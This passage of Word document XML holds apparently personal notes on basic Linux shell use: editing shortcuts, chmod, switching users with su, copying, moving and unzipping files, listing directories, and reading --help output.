    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003380">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="464"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Alt + D Or ESC + D:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Deletes the word to the right of the cursor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003381">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003382">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Delete Entire Line:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003383">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="99"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + U</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Deletes everything to the left of the cursor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003384">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="99"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + K</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Deletes everything to the right of the cursor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003385">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003386">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003387">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you try and run an executable and get this: "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">zsh: permission denied:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003388">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1171"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Do this: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x [fileName]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003389">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000338A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000338B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to switch users:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000338C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1455"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">su [username]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000338D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1455"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Requires you to know their password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000338E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1455"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo su [username]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000338F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1455"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you need sudo privileges in order to switch</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003390">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003391">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003392">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to move folders/file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003393">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1221"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mv /path/to/source_folder /path/to/destination</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003394">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003395">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to copy a folder:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003396">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="812"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cp -r /path/to/source_folder /path/to/destination/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003397">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to copy a file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003398">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="508"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cp /path/to/source_file /path/to/destination/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003399">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want to unzip into another directory (since sometimes if the zipped file has a lot of content, then you want to have it all organized in a separate directory);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000339A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="611"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">unzip my_archive.zip -d /path/to/destination/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000339B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000339C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_h4ry353zfkvl" w:id="458"/>
      <w:bookmarkEnd w:id="458"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Recursively looking through directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000339D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000339E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000339F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tree</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="995"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">VERY concise, which I like</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="995"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To limit the amount of levels, do </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tree -L 3</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033A2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="995"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tree --help</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for more information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033A3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033A4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls -R</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033A5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1380"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In powershell, it's</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ls -r</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033A6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033A7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033A8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_hu6rdlw7cvml" w:id="459"/>
      <w:bookmarkEnd w:id="459"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Help</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033A9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When you use --help, you might see something like this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033AA">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--kdb=s        Optional KeePass database file to open (must exist).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033AB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--timeout=i    Lock interface after i seconds of inactivity.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033AC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033AD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">=s</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> means it expects string argument and</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> =i </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">means it expects integer argument</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033AE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033AF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033B0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_901j719hndqe" w:id="460"/>
      <w:bookmarkEnd w:id="460"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UID and GID</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033B1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033B2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3162300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="28" name="image60.png"/>
